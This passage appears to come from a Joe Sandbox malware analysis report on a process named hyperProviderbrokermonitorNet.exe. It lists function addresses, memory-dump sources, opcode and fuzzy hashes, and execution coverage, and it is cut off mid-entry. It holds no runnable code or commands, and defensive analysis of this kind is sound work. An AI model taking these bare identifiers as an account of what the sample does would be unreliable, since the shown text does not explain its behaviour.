Function 00007FFD346909A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD346909C6

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 9b3ff80c72b3e984b43dc2b58049d48dc4c1b3f8b69a193df78c18f08d225df7
Instruction ID: 978a2fd5b2caf6c7b5025e35c267fe7a8785e0bd00cd34bed780ddbd1647b520
Opcode Fuzzy Hash: 9b3ff80c72b3e984b43dc2b58049d48dc4c1b3f8b69a193df78c18f08d225df7
Instruction Fuzzy Hash: 3BE06D71A4E7C04FCB16AA348868454BFB0EF6721174A52EEC146CF1A3EA2D9889CB11

Function 00007FFD34691D19 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD34691D36

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: fc3c4fddb17b1c5f759d886d9f497f25c76ee6bf298195cf18e9065bfa7d69c8
Instruction ID: 95f63a4ab7828515c80c7da358676d0a1c85eb44bc9dee3d539dec27fd973007
Opcode Fuzzy Hash: fc3c4fddb17b1c5f759d886d9f497f25c76ee6bf298195cf18e9065bfa7d69c8
Instruction Fuzzy Hash: F1E01A6154F3D44FDB46EF3488769943FA1AE6721078E44EEC185CF2B3E62D9849C701

Function 00007FFD3469AA39 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD3469AA56

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 21ef74a3b979bfb9ddb283e1f15735d63c90a0fc6ad76e729c1df5e63f121f24
Instruction ID: e7437273dc0183b01ab8f156d38a0b4a7c6ed2e47d7d2715b14cfa6959c32040
Opcode Fuzzy Hash: 21ef74a3b979bfb9ddb283e1f15735d63c90a0fc6ad76e729c1df5e63f121f24
Instruction Fuzzy Hash: 20E01A7154F7D04FCB46EB3488A98497FA0EE6721078B41EEC149CF1B3E62E8849C701

Function 00007FFD3469AB7D Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9164adcbf72e6f218a66191b26bf0e6341acbcc6c501f277c97cc8b960203304
Instruction ID: b54721531bb3a32b24547facc3c25368e3ab1d7b89e09b77cd89a4a5a686d179
Opcode Fuzzy Hash: 9164adcbf72e6f218a66191b26bf0e6341acbcc6c501f277c97cc8b960203304
Instruction Fuzzy Hash: 81612561F0D9AA0FE7A49F2888A61F877D1EF9A310B0801BBD54DC71D3DEAC6C45A741

Function 00007FFD34692351 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a44e7a89a846dfecb742c3dadf960b6b7f3e0168dd49505f8b1af607c80a83b4
Instruction ID: 02a6cbe93eeadc60d2ca97b1d72266bd8d27e7862f537e18506374ea32645968
Opcode Fuzzy Hash: a44e7a89a846dfecb742c3dadf960b6b7f3e0168dd49505f8b1af607c80a83b4
Instruction Fuzzy Hash: 2431F631B08A694FE799DE08C8E47F977E1FB96720F0405BAD40AD72D2CAB86C45C781

Function 00007FFD34660C25 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f69f75e3a6773893dbdaa4b2f3ebd32c3b6572cffe4ea77767d9ec2683437d7e
Instruction ID: 22873ac708c93b18f81dccb50f13b1ce1ec36a977a58d9b3c80d362cc3c48e93
Opcode Fuzzy Hash: f69f75e3a6773893dbdaa4b2f3ebd32c3b6572cffe4ea77767d9ec2683437d7e
Instruction Fuzzy Hash: 96210171B0DA998FE712DF68C8A92ED7FA0EF42324F1541BAC245DB1C2DA3C25499781

Function 00007FFD346919F4 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fee29c07e45828ec02916ee47b9d7c927f42ee5334e4c4caa9055946a59e7c49
Instruction ID: 9ad330754c729f7ad8de85432f4d2f1bcd95578ff917cae7561702b63d0594a7
Opcode Fuzzy Hash: fee29c07e45828ec02916ee47b9d7c927f42ee5334e4c4caa9055946a59e7c49
Instruction Fuzzy Hash: C0218132B1C6614BF71C9A1C94A93F936D1FB99719F14027DF48ED32C2DEAC9C428686

Function 00007FFD3469B6FA Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f83cbe8378a3d733648f099de35d5b3f5efb93124447eaad095e03279696906
Instruction ID: f38f45b518cc33817e2ad3ac1b329ddb5a25f71de293eacfc89dfd30420c726a
Opcode Fuzzy Hash: 7f83cbe8378a3d733648f099de35d5b3f5efb93124447eaad095e03279696906
Instruction Fuzzy Hash: 83110627A09A524BD319FB5CE4FA4F537D0FF9662970901BBC188CE0A3EC19A8498245

Function 00007FFD3469D8C9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11e2cf86af1eb43aef13be2b058c14980577b8c8436bbe3f5a84bca7d5790f2
Instruction ID: ee240ab2222d51f98c018b16f45e8337c1b49a0fa388223dbaff957df6d1d2c4
Opcode Fuzzy Hash: b11e2cf86af1eb43aef13be2b058c14980577b8c8436bbe3f5a84bca7d5790f2
Instruction Fuzzy Hash: 9201D432A1A68C4FDB45AF3488A88E8BFA4EF46214B4501FBD049CB1A3DA2D9948C701

Function 00007FFD34673E4B Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c937b5798fe80ebd74e9e0d95753576a29ae545cf6f6a81513086358ee270506
Instruction ID: bbf79c2957001c80e845c50ea55ed81bcfed52afa1c58f07338d8ea12bf921cb
Opcode Fuzzy Hash: c937b5798fe80ebd74e9e0d95753576a29ae545cf6f6a81513086358ee270506
Instruction Fuzzy Hash: 09015E71F0851A8FEB64EF94C8A56FD7BB1FF55315F14413AD04AE3292CE7829419B40

Function 00007FFD34698FC1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7ac56eb159517e4f069afe3a6c7a7206defe7576f6e9092ff7f9c1073346361
Instruction ID: 470797782cdb1779a90479cfbf47ea68e1ed0df901f4e6bca6b08e66a51fbd1d
Opcode Fuzzy Hash: e7ac56eb159517e4f069afe3a6c7a7206defe7576f6e9092ff7f9c1073346361
Instruction Fuzzy Hash: E6F0F652D0E6DA1EE7225B784C760E8BFA4EF13210F4822F7D18CC6493DD5D28569342

Function 00007FFD3469D764 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8824faa739a8b5c525c56362fab1864f74ad3c1190c23c53f576974bf5cb87c5
Instruction ID: 5670fb1cc87099002a606df298bc0ef3e24957c4f8c90a0997184ab50fbfd928
Opcode Fuzzy Hash: 8824faa739a8b5c525c56362fab1864f74ad3c1190c23c53f576974bf5cb87c5
Instruction Fuzzy Hash: BC01A731F0412A8FEB94EA65D4A53FE73E0EB95311F040536D20DD7286DA7CA9809780

Function 00007FFD34660C48 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3bc47833d86b07e1c1b59f4fcae6f80cd6f8f890e5ad5ed4a6e5d9dee05c139
Instruction ID: 90ea2e905f3d98e19dc12a337f4ca6bcf742d8d74d7c7b6e6b77f4e420b0b662
Opcode Fuzzy Hash: d3bc47833d86b07e1c1b59f4fcae6f80cd6f8f890e5ad5ed4a6e5d9dee05c139
Instruction Fuzzy Hash: 07019E71A0D7888FE702DF64C8941D9BFB0AF43324F1541EAC180DB192D6385648D781

Function 00007FFD346978B2 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4547a04120bbe8d0aa62d57a2d58b1650651410b333aec47b75c899bdd58d40
Instruction ID: 0ee739689b7959d50d4e6e64d5d50b3f5b6953f33272beb17ef1a46fe96d3e25
Opcode Fuzzy Hash: d4547a04120bbe8d0aa62d57a2d58b1650651410b333aec47b75c899bdd58d40
Instruction Fuzzy Hash: F8F0EC32A464488FDB45AF28D4988F8BB64EF17311B0441FAD10DC7162DE7A5945D700

Function 00007FFD3469A9A9 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d140e5c3707acddc8f81784745bececa7c3138d3388a30941b25bf415c9e0f8
Instruction ID: ddd711e5d3f02d3fd39ba227ab3ce92745a9cf654431faa806fe555c683b661a
Opcode Fuzzy Hash: 6d140e5c3707acddc8f81784745bececa7c3138d3388a30941b25bf415c9e0f8
Instruction Fuzzy Hash: A7F0EC31B19BC40FC759563D48A50617FF1EB5710134A12EFC096C7693ED58FC468745

Function 00007FFD34662AFB Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0f863701a97a61abaacad58cc0e0ccb745037c26bb12b6e94d994c9554b277c
Instruction ID: c1d4412d8c63427bde20b9418c144b894feedd587f6918d344b59ec0a7ccc4d1
Opcode Fuzzy Hash: f0f863701a97a61abaacad58cc0e0ccb745037c26bb12b6e94d994c9554b277c
Instruction Fuzzy Hash: E7F0EC30648A088FCF58EF04C494DAAB7F1FBA9311F144559D44BD7260DA79A985CF81

Function 00007FFD34692F49 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad1a8b8fa81af7bd5c8b4bf760a1116ae75c299a0388b777404f2fd4f3133132
Instruction ID: eda44fc76fbc6f701fec6a215690349b916c746f3960524e8ec8b4de0a879d35
Opcode Fuzzy Hash: ad1a8b8fa81af7bd5c8b4bf760a1116ae75c299a0388b777404f2fd4f3133132
Instruction Fuzzy Hash: F5E01221609B884FC70E963948695507FB1EB6711178952DBC445CB2A3D919DC89C751

Function 00007FFD3469D949 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ae607cddbe8ed08f534ad6b3e29562c5bbbca7b48e5e1448c58c4a593e7adf
Instruction ID: 173c41b6e3d0b4dc10c99784e121726cb37e62059dc1e74e7317ee8656832aad
Opcode Fuzzy Hash: c8ae607cddbe8ed08f534ad6b3e29562c5bbbca7b48e5e1448c58c4a593e7adf
Instruction Fuzzy Hash: B9E01A2294F7C04FCB4B9B3488A99907F70EF1721178A40EAC085CF6A3EA2DAC59C751

Function 00007FFD34675248 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b223518469489f8ed06297361b8ea904d9a81351c4ec4d90a65e7841d014a2c
Instruction ID: 8371c0acc520cd1fe6e4615c1e2dcd0afeb51519f901e8b50617478ecf058702
Opcode Fuzzy Hash: 4b223518469489f8ed06297361b8ea904d9a81351c4ec4d90a65e7841d014a2c
Instruction Fuzzy Hash: 4AD05E30B609494B8B8CA62D8468470B3D1E7AA2167D462B8940BC2281ED29ECC68B80

Function 00007FFD3469A510 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD3469A440 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD346978D9 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61239d679b9dcdb219fadb82e566505ef307ad150818f14d6b08d49160f4c7bd
Instruction ID: 274fdff2ddef36a8e85e1b5799a93dba970163568acca17c17b81f0deeb6e875
Opcode Fuzzy Hash: 61239d679b9dcdb219fadb82e566505ef307ad150818f14d6b08d49160f4c7bd
Instruction Fuzzy Hash: 63E04F2194E7C08FC74BAB3488B88507F70DE5721178A41EEC145CF5B3D62D8849C702

Function 00007FFD34691D30 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD34696E70 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
Instruction ID: 0b3335f499660e520532550416706150eb58efad8a857841b84cb8fba4dbfe91
Opcode Fuzzy Hash: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
Instruction Fuzzy Hash: 4FD01234B609044F870CAA388C998747391EBAA21779540B9D00BC72B1D96ADC89D781

Function 00007FFD3469B768 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cfeb8210af1f5946056ac14781613267785eb459361b3b6d7a9169be9049ff
Instruction ID: eaa5434544c5933223bb137adda916ba237a47e76573cc269d7db32b9e6c2e14
Opcode Fuzzy Hash: 11cfeb8210af1f5946056ac14781613267785eb459361b3b6d7a9169be9049ff
Instruction Fuzzy Hash: D8D01234B609044F870CBA3889A98747391EB6A21679544B9D00AC72B2D96ADC89DB41

Function 00007FFD346748FD Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa90a29e305fe821bada111ddc5005f10706fd753ff8886125b72888df011d23
Instruction ID: dacfc13f64a415cbaf6de3790553ad0882d4f1c966114fa02bf62e0477359007
Opcode Fuzzy Hash: fa90a29e305fe821bada111ddc5005f10706fd753ff8886125b72888df011d23
Instruction Fuzzy Hash: 75D0C920B0895A8BE656FE1CD8E46FD22A5FF46310F010431E90EC3196DE2CE851AA01

Function 00007FFD346625D6 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 841eb500bbb6b88b419a1399fc12f0e7d290fffd77a3018a40e2b1013b6a05ec
Instruction ID: 89444cb013b2fc179eef4e85a431283afae35248ae1728f89236789ac0f7b6ee
Opcode Fuzzy Hash: 841eb500bbb6b88b419a1399fc12f0e7d290fffd77a3018a40e2b1013b6a05ec
Instruction Fuzzy Hash: ACD0C914F1896A47E684AB2480B61FA16819B4A330F040875AA0EC73D2DD2C2C412A80

Function 00007FFD34661F58 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 905443de75d5f5cf95f89da95b19c81fe186f36051fa2054e7afba1a66c12da1
Instruction ID: 9cb17186ee884606b6a26962bb3609198451a5dc1ab9093bf2827a13c15b4438
Opcode Fuzzy Hash: 905443de75d5f5cf95f89da95b19c81fe186f36051fa2054e7afba1a66c12da1
Instruction Fuzzy Hash: 67D01220F0C5374BFBA4AA04C8A17F96256DF95324F1450B8DB4ED32C1DD3CAD806705

Function 00007FFD34662D4D Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction ID: af598657691767c2e8110a6b5b77218ee4270287afbaa972597fcde8123c2360
Opcode Fuzzy Hash: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction Fuzzy Hash:

Analysis Process: hyperProviderbrokermonitorNet.exePID: 3512, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD346910EA Relevance: 1.8, Strings: 1, Instructions: 527
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`t4, xrefs: 00007FFD346915C5

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: `t4
API String ID: 0-4056057151
Opcode ID: 9c812f07eaa8f5fdaa6325954663b3c163c9ac4994a90cbd625a5fd04072e660
Instruction ID: 75e1a2ffaa6465a0223f7246fff57cd0121502fa60dc5e9a623ef2e2916a703c
Opcode Fuzzy Hash: 9c812f07eaa8f5fdaa6325954663b3c163c9ac4994a90cbd625a5fd04072e660
Instruction Fuzzy Hash: 59E17931A1C6AA0BF72D9E2848E60F57791EB53315B2843BDCADBC3587DD6C680792C1

Function 00007FFD34660D47 Relevance: 1.5, Strings: 1, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5Z_H, xrefs: 00007FFD34660DF3

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: 32e567e7df56da6ccfabd2fd139ff3907b6d1a4a1d00ac7257e96e91bfe9f8bb
Instruction ID: 481f70d96aa6f3a405c1c462aa2e26a90c1699347ffe01ef8079129d52e753b0
Opcode Fuzzy Hash: 32e567e7df56da6ccfabd2fd139ff3907b6d1a4a1d00ac7257e96e91bfe9f8bb
Instruction Fuzzy Hash: 5F91F271A18A998FE799DB68C8B93E97FE1FB56314F4400BBD049D72E2CB7C28119740

Function 00007FFD34660E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c7db2793bc046540152b8bb4e69912ebc83fd4d94f605e5217507b5fd75b8f
Instruction ID: b26a412312e91ee13ef4ed0847a6237dda35bc09d82869560c3000d102e412de
Opcode Fuzzy Hash: e7c7db2793bc046540152b8bb4e69912ebc83fd4d94f605e5217507b5fd75b8f
Instruction Fuzzy Hash: FD51BF72B18A598FE798CF58D8B93E97EE1FB9A364F50007AD049D7391CBB824118340

Function 00007FFD34670A06 Relevance: 5.8, Strings: 4, Instructions: 826
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PXq4, xrefs: 00007FFD34670CCF
8Iq4, xrefs: 00007FFD34670B51
Bp4, xrefs: 00007FFD34670C53
p\q4, xrefs: 00007FFD346712F8

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: 8Iq4$Bp4$PXq4$p\q4
API String ID: 0-1725418635
Opcode ID: b6bb097fb18bf416e4ec20fdcd7036b1a2fbb903d5ee10469e23043ef8628707
Instruction ID: 99c82ddc626e9ecfcf860673a47736c5d0866f50c7c0bb6ec34f90da5832b823
Opcode Fuzzy Hash: b6bb097fb18bf416e4ec20fdcd7036b1a2fbb903d5ee10469e23043ef8628707
Instruction Fuzzy Hash: 3E42A471B1896A8BEB98EF18D8A56F877D2FF55310F0445BAD04ED3283DE2CAC819741

Function 00007FFD346716F8 Relevance: 5.7, Strings: 4, Instructions: 679
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PXq4, xrefs: 00007FFD34670CCF
8Iq4, xrefs: 00007FFD34670B51
Bp4, xrefs: 00007FFD34670C53
p\q4, xrefs: 00007FFD346712F8

Memory Dump Source

Source File: 00000027.00000002.2498475004.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: 8Iq4$Bp4$PXq4$p\q4
API String ID: 0-1725418635
Opcode ID: e19c671c68f7658cf892a1b43ca67919bfc2602de24cf0814df0b2cbb939b5ca
Instruction ID: 0a8839367d30a2612c235427bc3a2c1e9354d04a3dae9425a35f04ee68ed0fed
